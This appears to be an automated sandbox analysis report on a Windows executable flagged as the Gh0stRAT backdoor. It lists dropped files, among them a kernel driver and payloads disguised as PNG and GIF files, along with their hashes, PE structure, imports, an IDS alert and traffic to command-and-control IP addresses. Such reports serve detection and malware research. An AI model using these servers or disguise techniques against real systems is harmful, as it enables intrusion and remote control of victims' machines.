Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711581710723488
Encrypted:	false
SSDEEP:	384:9iegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQP:h5F1FUdy422IK+gAZt2i0YPpQn4GMk
MD5:	34EF3688CC82D4AC3178964E521B1CA0
SHA1:	9939B41F6AD4A3166A9BB213A69644D0FFB92F7B
SHA-256:	ACF855A579D7518320046AFB40E2B8D1D16B14F8E472458A34BA613CB70862A2
SHA-512:	F1656C774F95813E603331F47322ABEF293310BF8DBB36A5D1B07E9028EAF61F2B2A4AC3582618CEF984A7D60CA28BD20105DFE5C119D172F0B9D92A3704FCF6
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb8.bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.99993875520298
Encrypted:	true
SSDEEP:	98304:7AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:UndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	596C8B62EF07CDFFB26B2BAE091D7233
SHA1:	81874CED8BFFEDA91C9C786F9826F211D2133CEE
SHA-256:	56B39C80E12479D8A0FBAF2F30519718E21A443072028B2F4E7CE2AC5A51B943
SHA-512:	AFE4C62E8E809802785A3ECEBB0C3F0D9BD9446F12FB68D43D43FBF7D9C41E384CD7320F1B41DE58220F923C77BA4604FEB98D502CA1B7B5EDF3A836FDA81852
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.QB.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978936157803006
Encrypted:	false
SSDEEP:	192:cBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:cBuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	EF083BD328B7AB45AECADF1858BA655A
SHA1:	4B6783D3CD3FEAE11C38F462C7B20CD9A2018A9D
SHA-256:	89CCE2BD4ADF9F34791944D34AE1BAB2126233AAEC0F8F59CC2D8A8DE03912AB
SHA-512:	CAEF139958BB79CC7F958CA7D14F675336D8A060B672FFDAA2B95539E3E423D96F1D092D3575DF87A7C3E329F081ECF324F8D349622ECC60A058E99016E12105
Malicious:	false
Preview:	GIF89a.......,.s.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\lOXFJk.exe

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.002034939621464
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FC:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gC
MD5:	F5EFE7D6F9DC796BEFFA1A412A51C52F
SHA1:	610C0050CA2A8C46C42A0CED176B2A7347629725
SHA-256:	FD76B09D42048A6C29F004F534158F305A0001125B79FF6EB3BD8BD560414494
SHA-512:	F99853AF9C753F05CFB0DE4C92C249594068B47783A6C59D172B9B79242A3AFA067F8C0D616419C8F97A76AE724637F495D396F75A030E649CAE61FA60E55548
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.2291998416676115
Encrypted:	false
SSDEEP:	384:03YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/I:0OUkgfdZ9pRyv+uPzCMHo3q4tDghq
MD5:	96473E577EFC0CA943586470BBF8D34B
SHA1:	B8E3920E6677879A869A6332C4342C56EBD8A80F
SHA-256:	2F362CC2D86BD4F957CC7805D2E2B62028F98376FD37A30BBF72670D3A1667D3
SHA-512:	5D106223816A78C5848EC9FF855D6A7D12A4AA62D7D71B6B468E8E98DCD3B47D260A5B56DFA07D158730C06BC088468A13A364592D7A8807F8675E0354C144B8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................Z...........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	297
Entropy (8bit):	4.4299440683955185
Encrypted:	false
SSDEEP:	3:ri9K0/ldl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl8/lP92lU8IAuUWKznlu:ri9TDTwPYtyjtOsNaG4oiP
MD5:	FA33BB00F9F43434A06334B672D1E420
SHA1:	630C906782E5F147CF7FE54BA36CB67CE3727600
SHA-256:	1B813E26D0EA6CB2D184FC4FA520668C4DB18530B37B549A4F8B582F8DF76EC2
SHA-512:	A0C0F85F5EA644F720E224FCC029A75509136D7A17DCE306A2919932B61DA67768798424DA7F66D116AEA8A28A0F7358285EA9450A6D09B89578A41D47F95CD3
Malicious:	false
Preview:	..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....f...n8;.T....(]

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	0.08121435698808738
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	287438657364-7643738421.08.exe
File size:	30'886'912 bytes
MD5:	12771744b7de8ffb1f0dddf3ac8ed2f4
SHA1:	c05938c681c3c840a9e484bed33c48fcd033dd27
SHA256:	4df10f78a78892fea0c94ef9aca83ddac4045a1b2bec807f4bf563ac14551224
SHA512:	d4ec616cb51388ac364bf6d5abbf2dfe25010f8fdcbd5ae8d90e6b79a9789ca76006432f903355305a95d4730955762113c8b4471227b42823a87ddd83ce375e
SSDEEP:	3072:Y+JwGTjkeMwWO4Y7gDRq1OLNjXlQSupp:ZJTjkDwWNYLItXtcp
TLSH:	6D671615262000A5F71A87348956F9D0A6A67C794BE4E2CFE2387D3ADE321C3593B61F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..._..._..._..._..5_..._..8_..._..._..._..._..._..p_..._..6_..._Rich..._................PE..d.....XZ..........#

File Icon


Icon Hash:	8a80809292808001

Static PE Info

General

Entrypoint:	0x140004e80
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5A587FC5 [Fri Jan 12 09:28:37 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	31cc4901c4470c461b7b4afe57ed63f3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F81147ED104h
dec eax
add esp, 28h
jmp 00007F81147E7396h
int3
int3
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 00000088h
dec eax
lea ecx, dword ptr [0000D4B9h]
call dword ptr [000082E3h]
dec eax
mov eax, dword ptr [0000D5A4h]
dec eax
mov dword ptr [esp+58h], eax
inc ebp
xor eax, eax
dec eax
lea edx, dword ptr [esp+60h]
dec eax
mov ecx, dword ptr [esp+58h]
call 00007F81147F2856h
dec eax
mov dword ptr [esp+50h], eax
dec eax
cmp dword ptr [esp+50h], 00000000h
je 00007F81147EB1F3h
dec eax
mov dword ptr [esp+38h], 00000000h
dec eax
lea eax, dword ptr [esp+48h]
dec eax
mov dword ptr [esp+30h], eax
dec eax
lea eax, dword ptr [esp+40h]
dec eax
mov dword ptr [esp+28h], eax
dec eax
lea eax, dword ptr [0000D464h]
dec eax
mov dword ptr [esp+20h], eax
dec esp
mov ecx, dword ptr [esp+50h]
dec esp
mov eax, dword ptr [esp+58h]
dec eax
mov edx, dword ptr [esp+60h]
xor ecx, ecx
call 00007F81147F2804h
jmp 00007F81147EB1D4h
dec eax
mov eax, dword ptr [esp+00000088h]
dec eax
mov dword ptr [0000D530h], eax
dec eax
lea eax, dword ptr [esp+00000088h]
dec eax
add eax, 08h
dec eax
mov dword ptr [0000D4BDh], eax
dec eax
mov eax, dword ptr [0000D516h]
dec eax
mov dword ptr [0000D387h], eax

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[ASM] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf904	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d6f000	0xc088	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d6e000	0x858	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d7c000	0x160	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd3b0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd000	0x338	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb776	0xb800	7562aea4300b0a660a5939f140fe62b6	False	0.516007133152174	data	6.198028056797998	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xd000	0x33c6	0x3400	10fbb23f485a7b3126f7bd500efc4e97	False	0.36478365384615385	data	4.729795884700604	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x1d5c840	0x1d58c00	9a3be4c4122c6caa02f074abffb2f21f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1d6e000	0x858	0xa00	944d1977c688c60d0d795e2506ac3238	False	0.41875	data	3.893632257077923	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1d6f000	0xc088	0xc200	8a3ee32d65f93c0456a6a64a275d151b	False	0.12808070231958762	data	4.363440716953925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1d7c000	0x34a	0x400	afef91ea5ec9e1735d279b4047d87ed6	False	0.279296875	data	2.4933342466924753	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1d6f508	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.14650537634408603
RT_ICON	0x1d6f7f0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.30405405405405406
RT_ICON	0x1d6f918	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3070362473347548
RT_ICON	0x1d707c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.4842057761732852
RT_ICON	0x1d71068	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.3670520231213873
RT_ICON	0x1d715d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.1087136929460581
RT_ICON	0x1d73b78	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.23170731707317074
RT_ICON	0x1d74c20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.3599290780141844
RT_ICON	0x1d75088	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.14650537634408603
RT_ICON	0x1d75370	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.30405405405405406
RT_ICON	0x1d75498	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3070362473347548
RT_ICON	0x1d76340	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.4842057761732852
RT_ICON	0x1d76be8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.3670520231213873
RT_ICON	0x1d77150	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.1087136929460581
RT_ICON	0x1d796f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.23170731707317074
RT_ICON	0x1d7a7a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.3599290780141844
RT_MENU	0x1d7ac08	0x8e	data	English	United States	0.6971830985915493
RT_DIALOG	0x1d7ac98	0x150	data	English	United States	0.5833333333333334
RT_STRING	0x1d7ade8	0x42	data	English	United States	0.6363636363636364
RT_ACCELERATOR	0x1d7ae2c	0x10	data	English	United States	1.25
RT_GROUP_ICON	0x1d7ae3c	0x76	data	English	United States	0.6440677966101694
RT_GROUP_ICON	0x1d7aeb4	0x76	data	English	United States	0.6610169491525424
RT_MANIFEST	0x1d7af2c	0x15a	ASCII text, with CRLF line terminators	English	United States	0.5491329479768786

Imports

DLL	Import
KERNEL32.dll	CreateMutexW, GetLastError, OutputDebugStringW, SetProcessShutdownParameters, ReleaseMutex, GetCommandLineW, GetModuleFileNameW, LoadLibraryW, GetProcAddress, FreeLibrary, WritePrivateProfileStringW, GetSystemDirectoryW, CreateFileW, CloseHandle, ExitProcess, CreateThread, OpenFileMappingW, MapViewOfFile, GetStdHandle, OpenProcess, WaitForSingleObject, FlushFileBuffers, HeapSize, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, WriteConsoleW, SetStdHandle, MultiByteToWideChar, Sleep, HeapFree, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, LeaveCriticalSection, EnterCriticalSection, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, SetFilePointer, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, GetModuleHandleW, WriteFile, RtlUnwindEx, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, HeapSetInformation, GetVersion, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, VirtualAlloc
USER32.dll	SendMessageW, FindWindowW, MessageBoxW, EndDialog, PostQuitMessage, EndPaint, BeginPaint, DefWindowProcW, DestroyWindow, UpdateWindow, ShowWindow, CreateWindowExW, RegisterClassExW, LoadCursorW, LoadIconW, DispatchMessageW, TranslateMessage, TranslateAcceleratorW, GetMessageW, LoadAcceleratorsW, LoadStringW, DialogBoxParamW
SHELL32.dll	SHCreateDirectoryExW, SHGetFolderPathW, CommandLineToArgvW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T04:23:07.225604+0100	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.4	50017	8.217.47.169	8917	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 04:21:57.501727104 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:57.501768112 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:57.501996040 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:57.510715961 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:57.510726929 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:58.731971979 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:58.732053995 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:58.732628107 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:58.732677937 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:58.784487009 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:58.784497023 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:58.784708977 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:58.785665989 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:58.787486076 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:58.831341028 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:59.110452890 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:59.110515118 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:59.110523939 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:59.110567093 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:59.110918045 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:59.110953093 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:59.110970020 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:59.111000061 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:59.116144896 CET	49736	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:59.116158009 CET	443	49736	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:59.280879974 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:59.280935049 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:21:59.281008959 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:59.281279087 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:21:59.281295061 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.499547005 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.499629974 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:00.500456095 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:00.500467062 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.500684023 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:00.500689983 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.827723026 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.827744007 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.827778101 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:00.827804089 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.827815056 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:00.827847004 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:00.828164101 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.828227043 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:00.828609943 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:00.828654051 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.050276041 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.050386906 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.050715923 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.050771952 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.051264048 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.051309109 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.051310062 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.051331997 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.051350117 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.051367044 CET	49737	443	192.168.2.4	39.103.20.48
